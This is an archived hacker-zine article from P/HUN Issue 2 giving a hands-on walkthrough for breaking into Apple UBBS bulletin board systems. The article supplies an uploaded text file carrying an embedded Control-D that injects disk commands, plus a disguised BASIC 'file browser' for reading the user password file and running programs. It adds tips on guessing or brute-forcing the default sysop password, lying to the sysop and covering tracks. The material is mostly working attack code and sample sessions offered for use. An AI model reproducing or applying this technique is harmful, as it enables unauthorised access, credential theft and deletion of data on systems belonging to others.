home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / n_z / phun2.003 < prev    next >
Encoding:
Text File  |  2003-06-11  |  9.2 KB  |  309 lines
  1.  
  2. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3. =                Volume 1 , P/HUN Issue #2 , Phile #3 of 9                    =
  4. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5.  
  6.                     Defeating Security on Apple's UBBS
  7.                     ----------------------------------
  8.                        Writen by Evil Mind of CTG
  9.                        Computer Terrorists Guild
  10.  
  11.  
  12. Introduction
  13. -------------
  14.  
  15.    Hello fellow hackers are phreakers, I'm here to tell you all about Apple's
  16. UBBS.  This is a nice little program that will make any Apple computer with a
  17. modem have the ability to be a bbs.  It can be on any storage device, from
  18. a 5.25 disk, to a chain of hard drives.  I doubt any hackers or phreakers are
  19. using this program, because everyone (in Apple's world) uses GBBS.  So, let's
  20. get down to business.
  21.  
  22.    For flexability, UBBS has been written in BASIC.  For our convience, hackers
  23. with a knowledge of universial basic (or better yet, knowledge of Apple BASIC)
  24. will have a good time.  The only catch is, the control-c (break basic programs)
  25. is screened out by a ml routine before it hits basic.  But, no need to fear,
  26. discussion on hacking it is later.
  27.  
  28.    When a sysop first uses a UBBS program, the sysop must run the program
  29. SYSGEN.... which is for System Generation, the "Creator Program" for the
  30. board.  Questions are name of board, sysop's name, bullitin's names,
  31. and other things needed before the next program is run: LOGON... which will
  32. then put the computer in answer mode.
  33.  
  34.    Let's say some guy calls a few days later.  The LOGON program will then
  35. display a bbs title, then something like "Enter your name or press <RETURN>
  36. for NEW."  So, this guy does a <RETURN> for new... questions are asked, and
  37. then the sysop validates him.  Normal procedure like any other bbs program.
  38.  
  39. Hacking it
  40. -----------
  41.  
  42.    Once in the system, get access to the <F>eatures section which hopefully
  43. has a up/downloading section.  If they give a lame excuse of not giving
  44. it to you because of an IBM, lie in the validation part, and say you own an
  45. Apple.  First, upload some text file... like a list of bbs numbers.  If the
  46. file needs to be validated by the sysop before further access from the public,
  47. then it will be hard to hack it out. (Explained later.)
  48.  
  49.    Now, at least you have some access... hopefully the u/d ratio is 1:1 or
  50. better.  So, upload two more files!
  51.  
  52. File #1
  53. --------
  54.  
  55.    This is the most important file in the hacking process.  This file should
  56. contain the following or simular to it: (<CR>=<RETURN>) This is a TEXT file.
  57.  
  58. ------------------------------------------------------------------------------
  59.  
  60. THIS IS A POEM<CR>
  61. <CR>
  62. <Control-D>CAT<CR>
  63. RAT<CR>
  64. DOG<CR>
  65. PAT<CR>
  66. <CR>
  67. BY MR. WALTHER<CR>
  68.  
  69. ------------------------------------------------------------------------------
  70.  
  71. File explained:
  72.  
  73. Well, the control D is needed.  If you can't enter it from your word processor,
  74. then enter "DCAT" and go in with a disk editor and change character D into
  75. hex $04, which is a control-d to Apple. Normally, control-d is within programs,
  76. used to run disk commands from basic.  When viewed, it will catalog the
  77. current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie"
  78. mode.  Also, when downloading this file, view it, don't use Xmodem. But upload
  79. file #2 with it, so you can hack in one call and delete your tracks.
  80.  
  81.  
  82. File #2
  83. --------
  84.  
  85.    Well, this program is supposed to be basic, but since a lot of hackers I
  86. know have IBM's, I'll make it hackable from both Apple and IBM.  Make the
  87. following TEXT, that's right, text file.
  88.  
  89. ------------------------------------------------------------------------------
  90.  
  91. 10 ONERR GOTO 1000
  92. 20 HOME
  93. 30 PRINT "A DISK PREFIXER"
  94. 40 PRINT
  95. 50 PRINT "<P>REFIX   <C>ATALOG   <V>IEW   <D>ELETE   <R>UN"
  96. 60 INPUT A$
  97. 70 IF A$<>"P" OR A$<>"p" THEN 100
  98. 80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS"
  99. 90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40
  100. 100 IF A$<>"C" OR A$<>"c" THEN 120
  101. 110 PRINT CHR$(4);"CATALOG": GOTO 40
  102. 120 IF A$<>"D" OR A$<>"d" THEN 150
  103. 130 PRINT "DELETE WHAT FILE?"
  104. 140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40
  105. 150 IF A$<>"R" OR A$<>"r" THEN 180
  106. 160 PRINT "RUN WHICH FILE?"
  107. 170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40
  108. 180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40
  109. 190 PRINT "VIEW WHICH FILE?"
  110. 200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$
  111. 210 ONERR GOTO 230
  112. 220 INPUT B$: PRINT B$: GOTO 220
  113. 230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000
  114. 240 GOTO 40
  115. 1000 PRINT "ERROR!": CALL -1370
  116.  
  117. ------------------------------------------------------------------------------
  118.  
  119.    Upload the files.  When asked about file #2, say it's a TXT file.
  120.  
  121.    Now view file #1.  It will catalog (or DIR) the disk,
  122. and then be in a "zombie" state.  This is when the basic thinks the disk is
  123. still being read, and is really stuck, for you to enter things.  To clear that
  124. up, the INPUT command is used both for keyboard input, or in the correct
  125. conditions (that UBBS uses), disk input from text files!
  126.  
  127.    If you can't see it yet, press a control-D and a disk command.  The real
  128. intention is to run file #2, which will do the hacking.  But, File#2 and
  129. File#1 might be in a different directory than the transfer program.  Use
  130. these commands: (With a control-D before them)
  131.  
  132. CAT             to see what is on the disk.
  133.  
  134. Example:
  135.  
  136. ]CAT
  137.  
  138. /HARD1        (PREFIX NAME)
  139.  
  140. PROGRAMS          DIR   10-NOV-88  2
  141. PRODOS            SYS   06-APR-81  32
  142. BASIC.SYSTEM      SYS   07-APR-81  20
  143. BASIC.PROGRAMS    BAS   10-NOV-88  5
  144. ML.PROGRAMS       BIN   10-NOV-88  7
  145. READ.ME           TXT   10-NOV-88  10
  146.  
  147.    In which case, should explore further with a
  148.  
  149. ]PREFIX /HARD1/PROGRAMS
  150. ]CAT
  151.  
  152. /HARD1/PROGRAMS
  153.  
  154. LOGON             BAS   10-APR-84  54
  155. SYSOP             BAS   10-APR-84  34
  156.  
  157.    Once you explore enough to fine your files, do an:
  158.  
  159. ]EXEC file#2
  160.  
  161.    Replace "file#2" with whatever you named the second file.
  162. Note: exploring will take a long time, because you might need to find some
  163. other things to intrest you, like the logon program (which can be in another
  164. directory). When exploring in the zombie state, the computer sometimes zaps out
  165. back into normal running mode.  Re-download and start where you left off.
  166.  
  167. Then it'll go:
  168.  
  169. A DISK PREFIXER
  170.  
  171. <P>REFIX   <C>ATALOG   <D>ELETE   <V>IEW   <R>UN
  172. ?
  173.  
  174.    Then enter the desired one, in this case, "P" and press enter.
  175. Here's how to work them:
  176.  
  177. Examples: from basic
  178.  
  179. ]PREFIX /HARD1/FILES   (to get to the diectory /hard1/files)
  180. ]PREFIX /HARD1/        (to get back to /hard1)
  181. ]PREFIX                (tells you what the current prefix is)
  182. ]CATALOG               (DIR a disk for you)
  183. ]RUN LOGON             (Go back to LOGON program)
  184.  
  185.    View is a different thing, and can't be done from basic.  In this case,
  186. choose "V" for view, (beforehand, find the userinfo file, a text file.)
  187. And when it goes:
  188.  
  189. VIEW WHICH FILE?
  190. ?
  191.  
  192. type in a pathname.... example:
  193.  
  194. VIEW WHICH FILE?
  195. ?/HARD1/BBS/USERINFO.DATA
  196.  
  197. and it'll show the passwords.  Explore!  There are a lot of things to do.  One
  198. last word before you finish, the sysop is 001, find his password, log in as
  199. him, then make all your accounts from there (because he validates and creates
  200. accounts.)
  201.  
  202.    The form for UBBS passwords are:
  203.  
  204. NNNCCCC   where N is a number, and C is a character.
  205. example: 001SYSOP.  Also, 001SYSOP is the default password? (I'm not sure, but
  206. I think it is.)  Try it on a new board and see if the sysop didn't change it
  207. yet.
  208.  
  209. So if your victim board doesn't have the requirements, just use a password
  210. scanner and try out 001AAAA   001AAAB and all, and eventually you can get it
  211. in a matter of weeks.  (No lowercase or control characters are accepted by
  212. UBBS.)
  213.  
  214. All in a nutshell, here's another example:
  215.  
  216. ------------------------------------------------------------------------------
  217.  
  218. Welcome to a UBBS system.
  219.  
  220. Enter name or press return for new users
  221. XXXXXXX
  222. checking password.
  223. Hello Mr. Bill, today is 00/00/00
  224.  
  225. news for today:
  226.  
  227.                This is a new board and hope ya enjoy it,
  228.                 Your sysop, Tom Hacket.
  229.  
  230. No Email waiting
  231. Email>Quit
  232.  
  233. Main level:
  234. B/A/G/J/N/F/Q/Help
  235. >Features
  236.  
  237. loading xfer, please wait...
  238.  
  239. Xfer command>
  240. Upload
  241.  
  242. choose protocol:
  243.  
  244. X>modem
  245. T>ext
  246.  
  247. Xmodem
  248.  
  249.  
  250. (upload files)
  251.  
  252. 70 blocks recieved....
  253.  
  254. Information:
  255.  
  256. What is file#1's type:
  257. TXT
  258. What is file#2's type:
  259. TXT
  260.  
  261. Thank you.
  262.  
  263.  
  264. Xfer command>
  265. Download
  266.  
  267. Download what file?
  268. TEST.UPLOAD  (file#1)
  269.  
  270. THIS IS A POEM
  271.  
  272. /HARD1/ONLINE
  273.  
  274. CALLER.LOG   06   TXT
  275. USER.INFO    65   TXT
  276. LOGON        45   BAS
  277. SYSGEN       65   BAS
  278. TEST.UPLOAD  02   TXT
  279. PREFIXER     03   TXT
  280. LEECHES      02   TXT
  281.  
  282.  
  283. (Zombie state) (control-D)EXEC PREFIXER(return)
  284.  
  285. A DISK PREFIXER
  286.  
  287. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  288. ?B
  289.  
  290. NOT A COMMAND!
  291.  
  292. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  293. ?V
  294. VIEW WHICH FILE?
  295. ?USER.INFO
  296.  
  297. (list of passwords)
  298.  
  299. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  300. ?R
  301. RUN WHICH FILE?
  302. ?LOGON
  303.  
  304. (Automatically hangs up, you re-call, then log in as sysop, and make another
  305. account with good access.)
  306.  
  307.  
  308.  
  309.